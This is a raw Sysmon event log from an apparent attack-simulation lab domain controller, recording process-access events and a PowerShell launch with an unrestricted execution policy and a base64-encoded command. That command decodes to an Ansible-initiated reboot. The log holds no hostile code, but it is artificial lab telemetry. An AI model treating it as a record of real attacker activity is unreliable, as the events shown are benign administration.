13:33:21.653{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yo4zyc50.rmy.ps12021-01-18 13:33:21.653 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.638{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.606{59A5CD1D-8E21-6005-D702-00000000A201}46524256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.617{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.560{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.560{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.528{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wtlgnfkh.2z5.ps12021-01-18 13:33:21.528 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.513{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.497{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.497{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 